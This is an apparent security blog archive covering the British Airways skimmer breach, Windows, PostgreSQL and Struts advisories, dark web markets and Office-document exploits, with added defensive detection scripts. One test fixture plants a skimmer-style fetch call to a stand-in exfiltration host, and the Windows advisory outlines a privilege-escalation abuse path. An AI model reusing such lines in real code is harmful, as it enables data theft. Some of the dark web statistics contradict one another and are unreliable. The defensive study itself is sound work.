Archive for category Threats

British Airways faces Data Breach of 380,000 Accounts

Malicious JavaScript code had been planted within British Airways’ website, leading to a data breach of around 380,000 accounts.

RELEASE DATE: September 14th, 2018

INCIDENT

Starting on August 21st, around 380,000 accounts were compromised in a major data breach of British Airways, exposing customers’ information. Cybersecurity organization RiskIQ believes that the Magecart attackers, who were previously associated with the Ticketmaster UK breach earlier this year, were involved in the breach.

The attackers were successful in obtaining names, street and email addresses, credit card numbers, expiry dates and security codes of the airline’s customers, which could potentially lead to theft from user accounts.

British Airways stated that all payment information processed through the airline’s website and mobile app between August 21st and September 5th had been exposed.

ATTACK VECTOR

The evidence reveals that malicious JavaScript code had been planted within British Airways’ website.

Magecart has traditionally stolen data by injecting the malicious script into payment forms.

RiskIQ further reported that the attackers used only 22 lines of code to get hold of the data.

The attack compromised British Airways’ own web server; it was a highly targeted attack aimed at this particular website and its mobile application.

“This skimmer is attuned to how British Airways’ payment page is set up, which tells us that the attackers carefully considered how to target this site in particular,” said Yonathan Klijnsma, head researcher at RiskIQ.

ROOT CAUSE

Magecart’s association with the attack was identified because the attack was web-based and targeted credit card data. The attackers focused on the unique structure and functionality of the British Airways website and exploited its security lapses. RiskIQ crawled the scripts on the British Airways site and traced how they changed over time; in the process, the researchers found a modified script on the compromised site.

The BA site was found to be using a JavaScript library that called an API on a malicious web server at baways.com. That server is a virtual private server hosted by a provider in Lithuania, using a TLS certificate registered through Comodo on August 15 (to appear legitimate). The skimmer code was injected through this JavaScript library.

When a customer enters information on the website’s payment form and clicks “submit”, the 22 lines of code export the entered data to the malicious server as a JSON object.

The customer’s transaction is not disturbed and appears to take place over a secure session, while the attackers receive a full copy of the payment information. The attackers also added a “touchend” callback to the script, extending the attack to BA’s mobile app, which loaded the same modified script.

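The monitoring approach credited to RiskIQ above (crawling a site’s scripts and tracing how they change) can be reproduced as a small baseline-and-diff check. This is an added example, not RiskIQ’s or British Airways’ code; the HTML, script bodies and hostnames in it are constructed, with "shop.example" standing in for the monitored site and "exfil.example" for an unapproved destination.

```python
"""Baseline-and-diff monitoring of the scripts a payment page loads.
Added example, not RiskIQ's or British Airways' code: crawl a site's scripts,
record them, and report what changed, plus whether a script started talking to
a host the site owner never approved. All HTML, script bodies and hostnames
below are constructed; "shop.example" stands in for the monitored site."""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")

class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""
    def __init__(self, base_url):
        super().__init__()
        self.base_url, self.external, self.inline = base_url, [], []
        self._inline = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(urljoin(self.base_url, src))
            else:
                self._inline = True

    def handle_data(self, data):
        if self._inline and data.strip():
            self.inline.append(data.strip())

    def handle_endtag(self, tag):
        if tag == "script":
            self._inline = False

def describe(body):
    """Fingerprint a script: content hash plus every host it references."""
    return {"sha256": hashlib.sha256(body.encode()).hexdigest(),
            "hosts": sorted(set(HOST_RE.findall(body)))}

def snapshot(page_url, page_html, fetch):
    """Return {script_id: fingerprint}; fetch(url) returns a script body."""
    c = ScriptCollector(page_url)
    c.feed(page_html)
    state = {url: describe(fetch(url)) for url in c.external}
    for i, body in enumerate(c.inline):
        state[f"{page_url}#inline-{i}"] = describe(body)
    return state

def diff_snapshots(baseline, current, trusted_hosts):
    """Findings as (kind, script_id, detail): new or changed scripts, and any
    script served from or talking to a host outside the trusted set."""
    findings = []
    for sid, fp in current.items():
        if sid not in baseline:
            findings.append(("NEW_SCRIPT", sid, ""))
        elif baseline[sid]["sha256"] != fp["sha256"]:
            findings.append(("MODIFIED", sid, ""))
        for host in sorted({urlparse(sid).hostname, *fp["hosts"]} - {None}):
            if host not in trusted_hosts:
                findings.append(("UNTRUSTED_HOST", sid, host))
    findings += [("REMOVED", sid, "") for sid in baseline if sid not in current]
    return findings

# Constructed demo: the site's own library before and after tampering.
PAGE_URL = "https://shop.example/payment"
PAGE_HTML = '<html><body><script src="/js/lib.js"></script></body></html>'
CLEAN_LIB = "function ready() { return true; }"
TAMPERED_LIB = CLEAN_LIB + ' fetch("https://exfil.example/collect");'
TRUSTED = {"shop.example"}

def demo():
    before = snapshot(PAGE_URL, PAGE_HTML, lambda url: CLEAN_LIB)
    after = snapshot(PAGE_URL, PAGE_HTML, lambda url: TAMPERED_LIB)
    return diff_snapshots(before, after, TRUSTED)
```

Run against a real site, `fetch` would be an HTTP GET and the baseline would be persisted between runs; a MODIFIED finding on the site's own library paired with an UNTRUSTED_HOST is exactly the pattern the BA compromise would have produced.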

LESSON LEARNED

The British Airways website seems to have been operating without visibility into its Internet-facing web assets. As a result, British Airways could not detect this compromise and data breach until it was too late.

With so many attack vectors and ever-evolving cyber-attack techniques, organizations should make sure that their cybersecurity implementation is intact. With proper measures, visibility and regular penetration testing, such attacks can be nipped in the bud before they cause any damage.

Rewterz Threat Advisory – Microsoft Windows ‘SchRpcSetSecurity()’ Privilege Escalation Vulnerability

A vulnerability in Microsoft Windows Task Scheduler can be exploited to gain escalated privileges.

IMPACT: MEDIUM

PUBLISH DATE: 28-08-2018

OVERVIEW

Elevated SYSTEM privileges can be gained by exploiting an error in the Microsoft Windows Task Scheduler. The error occurs in the handling of ALPC calls related to the “SchRpcSetSecurity()” function.

ANALYSIS

In its handling of ALPC calls, the Microsoft Windows Task Scheduler contains a vulnerability that can permit a local user to gain SYSTEM privileges without needing authentication.

The public exploit code works on 64-bit Windows 10 and Windows Server 2016 systems. The publicly available exploit source code can be modified to make it compatible with other systems.

_SchRpcSetSecurity, part of the Task Scheduler ALPC endpoint, allows a caller to set an arbitrary DACL. It sets the security of a file in C:\Windows\Tasks, where even a Guest can write without impersonating. Before the Task Scheduler writes the DACL, the caller can create a hard link to any file it has read access to, which results in an arbitrary DACL write. The public PoC overwrites a printer-related DLL and uses it as a hijacking vector; this is just one of the many ways to abuse the flaw.

The error in the Task Scheduler is that the API function SchRpcSetSecurity fails to check permissions, allowing even a guest to call it and set file permissions on anything. The vulnerability was discovered by SandboxEscaper and needs prior code execution to exploit.

AFFECTED PRODUCTS

The exploit currently works only on 64-bit operating systems (likely Windows 10 and Server 2016).

MITIGATION

There is currently no practical fix for the vulnerability. Extra vigilance is therefore required in monitoring user behaviour on the network, and network traffic analytics should be used to detect unusual activity in traffic crossing the network.

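Because the abuse path described above relies on planting a hard link inside C:\Windows\Tasks, a directory that should hold only the service's own files, auditing that directory for files with more than one link is one concrete check a defender can run. This is an added example, not SandboxEscaper's PoC or Microsoft's code; it assumes Python's os.stat reports st_nlink for NTFS hard links (it does on CPython 3.x) and builds its own constructed fixture in a temporary directory so it runs anywhere.

```python
r"""Audit a directory for files that are hard links to something else.

Added example, not SandboxEscaper's PoC or Microsoft's code. The abuse path
in the advisory plants a hard link inside C:\Windows\Tasks so that the
service's DACL write lands on an unrelated file. A regular file with more
than one link (st_nlink > 1) in a directory that should contain only the
service's own files is therefore worth flagging. Assumptions: os.stat exposes
st_nlink for NTFS hard links on Windows (CPython 3.x does), and the caller
passes the directory to audit (C:\Windows\Tasks on a real host).
"""
import os
import tempfile
from typing import List, Tuple


def find_hard_links(directory: str) -> List[Tuple[str, int]]:
    """Return (path, link_count) for regular files that have extra hard links.

    Symlinks and subdirectories are skipped and only the directory itself is
    inspected, matching the single directory the flaw writes into."""
    suspicious = []
    with os.scandir(directory) as entries:
        for entry in entries:
            if not entry.is_file(follow_symlinks=False):
                continue
            st = entry.stat(follow_symlinks=False)
            if st.st_nlink > 1:
                suspicious.append((entry.path, st.st_nlink))
    return sorted(suspicious)


def build_demo_dir() -> str:
    """Constructed fixture: one ordinary task file, plus one file that is a
    hard link to a 'protected' target outside the audited directory (a
    stand-in for the DLL the PoC overwrites)."""
    root = tempfile.mkdtemp(prefix="tasks-audit-")
    tasks = os.path.join(root, "Tasks")
    os.mkdir(tasks)
    with open(os.path.join(tasks, "legit.job"), "w") as f:
        f.write("normal task file\n")
    target = os.path.join(root, "protected.dll")
    with open(target, "w") as f:
        f.write("stand-in for a system DLL\n")
    os.link(target, os.path.join(tasks, "UpdateTask.job"))
    return tasks


def demo() -> List[str]:
    """Names of the files flagged in the constructed fixture."""
    tasks = build_demo_dir()
    return [os.path.basename(p) for p, _ in find_hard_links(tasks)]
```

On a production host the same function would be scheduled against C:\Windows\Tasks, and any hit correlated with the DACL change on the linked target.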

Rewterz Threat Advisory – Red Hat Update for postgresql

Red Hat has issued an update for postgresql. It fixes a vulnerability in which certain host connection parameters defeat client-side security defenses.

IMPACT: CRITICAL

PUBLISH DATE: 24-08-2018

OVERVIEW

libpq, the default PostgreSQL client library, was found to be vulnerable because it failed to properly reset its internal state between connections. If an affected version of libpq was used with “host” or “hostaddr” connection parameters taken from untrusted input, attackers could bypass client-side connection security features, gaining access to higher-privileged connections or potentially causing other impacts, such as SQL injection by making the PQescape() functions malfunction.

ANALYSIS

An attacker can only exploit this vulnerability by providing or influencing connection parameters to a PostgreSQL client application that uses libpq. The contrib modules “dblink” and “postgres_fdw” are examples of applications affected by this flaw. Red Hat Virtualization includes vulnerable versions of postgresql.

However, this flaw is not known to be exploitable under any supported configuration of Red Hat Virtualization, and a future update may address this issue. Red Hat has issued updates fixing the vulnerability.

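Since the flaw is only reachable when “host” or “hostaddr” come from untrusted input, the client-side defence is to never let input choose those keys. The following is an added example, not PostgreSQL's or Red Hat's code: a parser for libpq's keyword=value conninfo grammar and a merge function that refuses server-selecting keys; the allowlist, the trusted base configuration and the sample strings are constructed.

```python
"""Guard libpq connection parameters that come from untrusted input.

Added example, not PostgreSQL's or Red Hat's code. The advisory's trigger for
CVE-2018-10915 is "host"/"hostaddr" reaching libpq from untrusted input, as
can happen through dblink or postgres_fdw. The parser follows libpq's
keyword=value conninfo grammar (single-quoted values, backslash escapes); the
allowlist, the trusted base config and the sample strings are constructed.
"""
import re

# Keys an untrusted caller may set; everything else must come from trusted config.
UNTRUSTED_MAY_SET = {"dbname", "application_name", "options"}
# Keys that choose which server receives the credentials: never taken from input.
SERVER_SELECTING = {"host", "hostaddr", "port", "service", "sslmode", "sslrootcert"}

_TOKEN = re.compile(r"\s*([A-Za-z_][A-Za-z0-9_]*)\s*=\s*('(?:[^'\\]|\\.)*'|[^\s']+)")


def parse_conninfo(text):
    """Parse "k=v k2='v 2'" into a dict, rejecting anything off-grammar."""
    params, pos = {}, 0
    while text[pos:].strip():
        m = _TOKEN.match(text, pos)
        if not m:
            raise ValueError(f"malformed conninfo near offset {pos}")
        key, raw = m.group(1), m.group(2)
        if raw.startswith("'"):
            raw = re.sub(r"\\(.)", r"\1", raw[1:-1])  # unescape \' and \\
        if key in params:
            raise ValueError(f"duplicate key {key!r}")
        params[key] = raw
        pos = m.end()
    return params


def quote(value):
    """libpq-style quoting so the rebuilt string re-parses identically."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def build_conninfo(trusted, untrusted_text):
    """Merge caller-supplied parameters onto a trusted base configuration.

    Any attempt to set a server-selecting key, or a key outside the allowlist,
    is refused outright: fail closed rather than let input pick the server."""
    untrusted = parse_conninfo(untrusted_text)
    bad = sorted(k for k in untrusted
                 if k in SERVER_SELECTING or k not in UNTRUSTED_MAY_SET)
    if bad:
        raise PermissionError("untrusted input may not set: " + ", ".join(bad))
    merged = {**trusted, **untrusted}
    return " ".join(f"{k}={quote(v)}" for k, v in merged.items())


# Constructed trusted base configuration used by the demo.
TRUSTED = {"host": "db.internal.example", "port": "5432",
           "user": "app_ro", "sslmode": "verify-full"}


def is_refused(untrusted_text):
    """True when build_conninfo rejects the caller-supplied text."""
    try:
        build_conninfo(TRUSTED, untrusted_text)
        return False
    except PermissionError:
        return True
```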

AFFECTED PRODUCTS

Postgresql versions before 10.5, 9.6.10, 9.5.14, 9.4.19, and 9.3.24 are affected in:

  • Red Hat Software Collections (for RHEL Server) 1 for RHEL 7.5 x86_64
  • Red Hat Software Collections (for RHEL Server) 1 for RHEL 7.4 x86_64
  • Red Hat Software Collections (for RHEL Server) 1 for RHEL 7.3 x86_64
  • Red Hat Software Collections (for RHEL Server) 1 for RHEL 7 x86_64
  • Red Hat Software Collections (for RHEL Server) 1 for RHEL 6.7 x86_64
  • Red Hat Software Collections (for RHEL Server) 1 for RHEL 6 x86_64
  • Red Hat Software Collections (for RHEL Workstation) 1 for RHEL 7 x86_64
  • Red Hat Software Collections (for RHEL Workstation) 1 for RHEL 6 x86_64
  • Red Hat Virtualization Manager 4.2 x86_64

UPDATES

  • BZ 1508820 – CVE-2017-15098 postgresql: Memory disclosure in JSON functions
  • BZ 1508823 – CVE-2017-15099 postgresql: INSERT … ON CONFLICT DO UPDATE fails to enforce SELECT privileges
  • BZ 1539619 – CVE-2018-1053 postgresql: pg_upgrade creates file of sensitive metadata under prevailing umask
  • BZ 1547044 – CVE-2018-1058 postgresql: Uncontrolled search path element in pg_dump and other client applications
  • BZ 1609891 – CVE-2018-10915 postgresql: Certain host connection parameters defeat client-side security defenses
  • BZ 1612619 – CVE-2018-10925 postgresql: Missing authorization and memory disclosure in INSERT … ON CONFLICT DO UPDATE statements

Follow the link for further guidance on how to apply updates:

https://access.redhat.com/articles/11258


Rewterz Threat Advisory – CVE-2018-11776 Apache Struts Remote Code Execution Vulnerability

A remote code execution vulnerability exists in various versions of Apache Struts that may allow an attacker to take control of a system after a successful attack.

IMPACT: HIGH

PUBLISH DATE: 23-08-2018

OVERVIEW

The independent security research group Semmle has released a finding, confirmed by the Apache Foundation, that a critical remote code execution flaw exists in the popular Struts 2 open source framework. The vulnerability is located in the core of Apache Struts 2 and impacts all supported versions of Struts 2.

The vulnerability originates from insufficient validation of user-provided, untrusted input in the core of the Struts framework under certain configurations. The exploit can be triggered simply by visiting a specially crafted URL on the affected web server. It enables attackers to execute malicious code and eventually take complete control of the server on which the vulnerable application is running.

ANALYSIS

The vulnerability involves the injection of a payload as unvalidated input into a Struts application, which is then evaluated and used to achieve remote code execution.

The exploit uses an obscure expression language called OGNL, used by only a few Java-based frameworks such as Struts and Spring Web Flow. The OGNL expression payload results in remote code execution affecting Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16.

The vulnerability exists because the affected software insufficiently validates user-supplied input, allowing the use of results with no namespace value and the use of URL tags with no value or action. In cases where upper actions or configurations also have no namespace or a wildcard namespace, an attacker could exploit this vulnerability by sending a request that submits malicious input to the affected application for processing.

Successful exploitation leads to execution of arbitrary code in the security context of the targeted system or the affected application.

AFFECTED PRODUCTS

Apache Struts versions:

  • 2.3 to 2.3.34
  • 2.5 to 2.5.16

VULNERABILITY INDICATORS

All applications that use Apache Struts supported versions (Struts 2.3 to Struts 2.3.34, and Struts 2.5 to Struts 2.5.16) are potentially vulnerable to this flaw, even without enabling any additional plugins.

The following conditions indicate that Apache Struts is vulnerable to the Remote Code Execution flaw:

  • The “alwaysSelectFullNamespace” flag is set to true in the Struts configuration.
  • Struts configuration file contains an “action” or “URL” tag that does not specify the optional namespace attribute or specifies a wildcard namespace.

MITIGATION

Apache Struts has fixed the vulnerability with the release of Struts versions 2.3.35 and 2.5.17. Both versions contain only the security fixes, and no backward-incompatibility issues are expected. All users of vulnerable versions of Apache Struts are advised to upgrade to the patched versions as soon as possible.

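The two indicator conditions listed above can be checked statically before upgrading. This is an added example, not Apache's or Semmle's code: it scans a struts.xml and JSP text for the alwaysSelectFullNamespace constant and for action mappings or <s:url>/<s:action> tags without a concrete namespace. It assumes that in struts.xml the namespace is declared on the enclosing <package> (so an <action> inherits it), and the sample configuration is constructed.

```python
"""Static check for the two CVE-2018-11776 indicator conditions.

Added example, not Apache's or Semmle's code. It reads struts.xml and any
JSP/template text and reports (a) struts.mapper.alwaysSelectFullNamespace set
to true and (b) action mappings or <s:url>/<s:action> tags with no namespace
or a wildcard one. Assumption: in struts.xml the namespace is declared on the
enclosing <package>, so an <action> inherits it. The sample files are constructed.
"""
import re
import xml.etree.ElementTree as ET

FULL_NS_CONSTANT = "struts.mapper.alwaysSelectFullNamespace"
TAG_RE = re.compile(r"<s:(url|action)\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r'(\w+)="([^"]*)"')


def namespace_risk(ns):
    """'missing' if the attribute is absent or empty, 'wildcard' if it contains
    '*', otherwise None (a concrete namespace)."""
    if ns is None or not ns.strip():
        return "missing"
    return "wildcard" if "*" in ns else None


def audit_struts_xml(xml_text):
    """Findings as (kind, where, detail) tuples for a struts.xml document."""
    root = ET.fromstring(xml_text)
    findings = []
    for const in root.iter("constant"):
        if const.get("name") == FULL_NS_CONSTANT and const.get("value", "").lower() == "true":
            findings.append(("constant", FULL_NS_CONSTANT, "set to true"))
    for pkg in root.iter("package"):
        risk = namespace_risk(pkg.get("namespace"))
        if risk:
            for action in pkg.iter("action"):
                findings.append(("action", f"{pkg.get('name')}/{action.get('name')}", risk + " namespace"))
    return findings


def audit_jsp(jsp_text):
    """Findings for Struts <s:url>/<s:action> tags lacking a concrete namespace."""
    findings = []
    for m in TAG_RE.finditer(jsp_text):
        attrs = dict(ATTR_RE.findall(m.group(2)))
        risk = namespace_risk(attrs.get("namespace"))
        if risk:
            findings.append(("tag", f"s:{m.group(1)} {attrs.get('action', '?')}", risk + " namespace"))
    return findings


def is_exposed(xml_findings, jsp_findings):
    """True when both indicators hold: the constant is on and at least one
    mapping or tag has no concrete namespace."""
    has_const = any(f[0] == "constant" for f in xml_findings)
    has_gap = any(f[0] != "constant" for f in xml_findings) or bool(jsp_findings)
    return has_const and has_gap


# Constructed sample application: one package without a namespace, one with a
# wildcard, one correctly scoped, and the constant switched on.
SAMPLE_STRUTS_XML = """<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>
  <package name="default" extends="struts-default">
    <action name="help" class="com.example.HelpAction"/>
  </package>
  <package name="admin" namespace="/admin" extends="struts-default">
    <action name="index" class="com.example.AdminAction"/>
  </package>
  <package name="wild" namespace="/*" extends="struts-default">
    <action name="any" class="com.example.AnyAction"/>
  </package>
</struts>"""
SAMPLE_JSP = '<s:url action="help"/> <s:url namespace="/admin" action="index"/>'
```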

Disturbing Secrets Of The Deep And Dark Web

THE SURFACE WEB

The billions of accessible websites on the internet today seem overwhelming to the average person. What’s more surprising is that these websites make up only about 7-10% of the entire internet: the surface web. The bulk of the internet is hidden in what’s called the deep web and, deeper still, the dark web.

The visible World Wide Web, with its billions of publicly accessible websites, consists of the sites that appear in search engines when searched for by keyword. They are discovered by web crawlers, the search engine components responsible for merging, interlinking and ranking search results on the surface web. A crawler keeps track of all the websites and the links to their webpages found on the surface web and ranks them according to their content, organizing them into an index.

UNDERSTANDING THE DEEP WEB

One step deeper into the ocean of the internet lies the deep web. Websites on the deep web prevent indexing by search engines: web crawlers are not allowed to access them or gather public links from them. These sites are either intentionally made inaccessible or are hidden by their nature. Several methods are used to prevent indexing. Owners avoid linking their pages from surface websites or search engines, so they cannot be found through search; access can also be restricted technically, for example with a CAPTCHA, or by requiring a user to log in before accessing any page.

For example, a large amount of content on Pastebin or GitHub has no links pointing to it and can only be reached through site-specific search tools. Portals created for specific people and accessible only with their credentials are also examples of the deep web.

DEEPER INTO THE DEEP WEB; FINDING THE DARK WEB

Just as the ocean hides mysteries in its depths, the internet hides hideous tales in the depths of the dark web. The dark web is a mystery in its entirety, with every user being anonymous.

By definition, the dark web, or darknets, are highly encrypted networks built on top of the internet that can only be accessed with specialized software. Websites on the dark web cannot be reached by ordinary users browsing the surface web.

These unindexed sites are called dark because all of their users are anonymous. The dark web is the most popular platform for supporting illegal activities.

The best-known example of illegal activity on the dark web is the creation of Silk Road by Ross William Ulbricht, known as Dread Pirate Roberts. Silk Road generated $1.2 billion in 2 years and 9 months, mostly by selling illegal drugs alongside other illegal activity. It was dismantled by the US federal government in September 2013. In the same year, the user base of The Onion Router, the most common network on the dark web, reached 4 million people worldwide.

THE ONION ROUTER

These websites are hosted either on private networks like Tor (The Onion Router) or on peer-to-peer networks like the Invisible Internet Project (I2P), which can also be accessed from web browsers. The dark web routes traffic over the network with layers of encryption to preserve the anonymity of its users.

The dark web is not accessible to the average person; reaching it requires access to a private network. The dark web enforces many restrictions to maintain the privacy of its users.

The Onion Router browser, first created by the US Navy, is one of the most popular browsers used to browse the dark web anonymously.

How Does Tor Maintain User Privacy?

This highly secure, easy-to-use, free software is installed in minutes and routes network traffic through various Tor servers located around the globe. This means that if a packet is intercepted in transit, it will only show random nodes as sender and receiver.

The dark web therefore looks like a highly charged galaxy of moving nodes. This routing mechanism makes it impossible to trace a user’s activity on the dark web.

Many dark web sites use the top-level domain (TLD) ‘.onion’ rather than surface web domains like ‘.com’, ‘.org’ or ‘.gov’. These domains can only be accessed with browsers or apps running on the Tor network, such as the Orbot and Orfox mobile apps.

ACCESSING A DARKNET

Darknets allow access in different ways, depending on their purpose, such as communication or anonymous browsing. They also differ in their level of security, depending on the encryption protocols and routing they use.

FRIEND-TO-FRIEND DARKNET

Friend-to-friend (F2F) is a form of peer-to-peer network accessible only to a specific ring of IP addresses. Owners can block other IPs to hide their presence on the network.

An F2F network has enhanced security, with every exchange on the network encrypted under additional protective layers.

WHAT’S HAPPENING IN THE DARK WEB; SNEAK PEEK

The internet is a flow of information, a huge amount of it personal. The surface internet is evolving swiftly, yet compared to the surface web, the deep web is huge.

  • In July 2016, 46% of the world was found to be connected to the internet.
  • February 2017 figures showed 1.154 billion websites on the surface net.
  • The deep web is 4000 times bigger than the surface web and is growing at a rate that cannot be quantified.

The information flowing through the surface web is often attacked, stolen and sold. Medical records, IDs, photographs, passports, credit card credentials, subscription accounts, browsing history, bank account details: everything is being sold on the dark web.

Who buys this information? Umm, it’s hard to tell. Hackers, scammers, marketers, competitors. Anyone.

The darknet hosts this black market of information, where stolen data is bought and sold anonymously. The dark web serves as an easy marketplace for finding the right customers for any kind of information.

This is one of the reasons cryptocurrencies were readily adopted for illegal transactions: they hide identities.

Many researchers have dived into the depths to study the activities going on in the dark web. In January 2018, 6,608 dark websites were crawled, covering all types of webpages from entertaining to horrifying, and this is what they found.

CONTENTS OF THE DARK WEB

The dark web deals in all kinds of scams and illicit content. From credit card cloning products to ingenious bitcoin scams, everything is available for purchase on the dark web, every passing second. A highly disturbing number of child abuse sites and other extreme websites were found on the dark web selling private photos and sexual content.

  • There are 50,000 extremist and terrorist groups operating on the dark web.
  • Moreover, the 60 largest sites on the dark web hold a combined 750 TB of data. Surprisingly, this alone is 40 times more data than the entire surface web combined.

Did You Know?

  • A medical record sells for $50
  • Credit card information sells for $20-100
  • Your Social Security number is worth $1 on the dark web
  • Your bank account details can be sold for $1000
  • 500,000 email addresses sell for $50
  • Mobile malware is sold for $150
  • Commercial malware is sold for $2500
  • Exploits can cost anywhere from $150,000 to millions of dollars

THE MONOPOLY OF THE DARK WEB

The dark web has a monopoly on the breached private information of organizations, which therefore pay large amounts of money to safeguard leaked information found there. The number of breaches has gone down, whereas the damage caused by each data breach has gone up significantly. In 2017, organizations paid up to $140 per record to protect it from violation and misuse.

However, information sold on the dark web is not guaranteed to be genuine; it can be fabricated to ruin the reputations of organizations. Vendors are rated by buyers to establish some level of credibility regarding what they bring to the table.

FITTING TOR INTO THE GEOGRAPHY

Use of The Onion Router to access the dark web cannot be pinned to one geography, and no country can be singled out as responsible for the existence of the dark web. However, according to 2017 statistics:

  • The largest share of Tor users comes from the USA, at 19.2%.
  • Russians make up 11.9% of Tor users.
  • 9% of Tor traffic comes from Germany.
  • 9.2% of Tor traffic comes from the UAE.
  • A report by Visual Capitalist claims that 80% of Tor is funded by the US Government.

CONCLUSION

The commonly known websites available through search engines are called the surface web. These sites make up only 7% of the entire World Wide Web. The rest of the internet is a highly encrypted world unavailable for general browsing, called the deep web. A considerable part of this web is used for illegal activities and is thus called the dark web. The dark web offers absolute anonymity to all of its users, and all kinds of sensitive information, malicious software and illegal content are bought and sold there. When crafting security strategies, most organizations are unaware of the existence of the darknet. It is important to treat this huge part of the internet as a threat factor when planning threat mitigation.


Latest Favorite Platform for Zero-Day Exploits: Microsoft Office

Cybercriminals turn to Microsoft Office documents for conducting their zero-day exploits, using office files to execute remotely hosted malware.

Cyberattacks are being launched through the most common tool of office work: email. Microsoft Office documents are routinely attached to emails for file transfer and data sharing. Targeting this mode of communication, attackers use email attachments to achieve remote code execution on systems; the remotely hosted malicious components are easily delivered to a system via email.

Almost all zero-day exploits from late 2017 and early 2018 have used Office documents such as Word files and Excel sheets. Ordinary users do not suspect these documents, and their malicious components are hard to detect.

Evolution in Techniques

MS Office has become closely linked with cybercrime. Researchers report that email phishing has evolved and matured over time, and attackers have found new ways of exploiting Office documents. Instead of attaching files with embedded malicious macros, they use Office files to fetch remotely hosted malicious components, which launch exploits in the browser. Getting users to ‘enable macros’ was a common trend in the past, but with the evolution of advanced security measures and a more tech-savvy audience, this trend has declined and now produces little for the attacker. In the constant battle between attack and defense, advanced strategies are evolving at both ends, to exploit the endpoint and to protect it.

Down memory lane: trouble begins with CVE-2017-0199

Word documents have never been immune to vulnerabilities. One of these loopholes, CVE-2017-0199, the MS Office/WordPad remote code execution vulnerability, makes use of a logic flaw in MS Word. It surfaced in 2016 when an attack was launched using Word files as carriers: something embedded in the files was able to fetch remote malware from the web.

The Object Linking and Embedding (OLE) Technology

Object Linking and Embedding (OLE) technology is used to deliver malware to a system, through which attackers can execute code on the compromised system.

The trend of remotely hosted cyberthreats has grown ever since this vulnerability was exploited. The recent “CVE-2018-8174 Windows VBScript Engine Remote Code Execution Vulnerability” is evidence of the emerging trend. Exploiting the library used by Internet Explorer, this “Double Kill” bug could let an attacker execute code with the current user’s privileges.

A malicious RTF file attached to an email contains an OLE object, which downloads and renders an HTML page when activated. VBScript on the page uses the exploit to pull a remote payload onto the endpoint.

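The RTF-to-OLE-to-HTML chain just described leaves static traces a mail gateway can look for: an \object group carrying \objdata hex, and a URL inside that hex once it is decoded. The following is an added example, not Microsoft's or any vendor's code; the sample RTF is constructed and inert, with its only payload being a URL to the placeholder host remote.invalid.

```python
"""Triage an RTF attachment for embedded OLE objects that point at the web.

Added example, not Microsoft's or any vendor's code. The delivery chain the
article describes (RTF -> OLE object -> remote HTML page) leaves two static
marks: an \\object group carrying \\objdata hex, and a URL inside that hex
once decoded. The sample RTF below is constructed and inert; its only payload
is a URL to the placeholder host remote.invalid.
"""
import re

OBJECT_RE = re.compile(r"\\object\b", re.IGNORECASE)
OBJDATA_RE = re.compile(r"\\objdata\b\s*([0-9A-Fa-f\s]+)", re.IGNORECASE)
URL_RE = re.compile(rb"https?://[\x21-\x7e]+", re.IGNORECASE)


def decode_objdata(hex_blob):
    """RTF stores the OLE stream as hex text; strip whitespace and decode."""
    compact = re.sub(r"\s+", "", hex_blob)
    if len(compact) % 2:
        compact = compact[:-1]  # tolerate a truncated trailing nibble
    return bytes.fromhex(compact)


def extract_urls(blob):
    """URLs in the decoded stream, stored either as ASCII or as UTF-16LE."""
    views = (blob, blob.replace(b"\x00", b""))  # second view folds UTF-16LE
    found = {m.group(0).decode("ascii", "replace")
             for view in views for m in URL_RE.finditer(view)}
    return sorted(found)


def triage_rtf(rtf_text):
    """Count \\object groups, decode every \\objdata blob and collect URLs."""
    report = {"objects": len(OBJECT_RE.findall(rtf_text)),
              "objdata_bytes": [], "urls": set()}
    for m in OBJDATA_RE.finditer(rtf_text):
        blob = decode_objdata(m.group(1))
        report["objdata_bytes"].append(len(blob))
        report["urls"].update(extract_urls(blob))
    report["urls"] = sorted(report["urls"])
    # An embedded object that carries a URL is the pattern worth quarantining.
    report["suspicious"] = report["objects"] > 0 and bool(report["urls"])
    return report


# Constructed, inert sample: an OLE header stand-in, a class name and a
# UTF-16LE URL, written the way RTF stores object data (as hex text).
_PAYLOAD = (b"\x01\x05\x00\x00\x02\x00\x00\x00" + b"htmlfile\x00"
            + "http://remote.invalid/stage.html".encode("utf-16-le"))
SAMPLE_RTF = ("{\\rtf1\\ansi{\\object\\objemb{\\*\\objdata "
              + _PAYLOAD.hex() + "}}\\par Quarterly figures attached.}")
CLEAN_RTF = "{\\rtf1\\ansi\\par Quarterly figures attached.}"
```

A gateway rule built on this would quarantine any RTF whose report is marked suspicious and log the extracted URLs for blocking at the proxy.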

Even though Microsoft has patched both CVE-2017-0199 and CVE-2018-8174, some individuals and organizations may still be vulnerable because they have delayed patching.

Why Office Documents?

Office documents are convenient because they can be used against applications that are targeted through the browser. Links sent in malicious emails open in Internet Explorer. Since most systems do not have IE as their default browser, they may be running outdated and vulnerable versions of IE, which are nevertheless used automatically to open the links received in emails. Hence, an Internet Explorer zero-day embedded in a Word file can be used to target a system that does not use IE as its default browser.

Remotely hosted malware attacks are trending because they tend to evade security systems. When differentiating between ‘good’ and ‘bad’ content, a security system can let a document slip through if it only contains a link, whereas a document containing the malware itself can easily be scanned and detected by antivirus software.

Copyright © Rewterz. All rights reserved.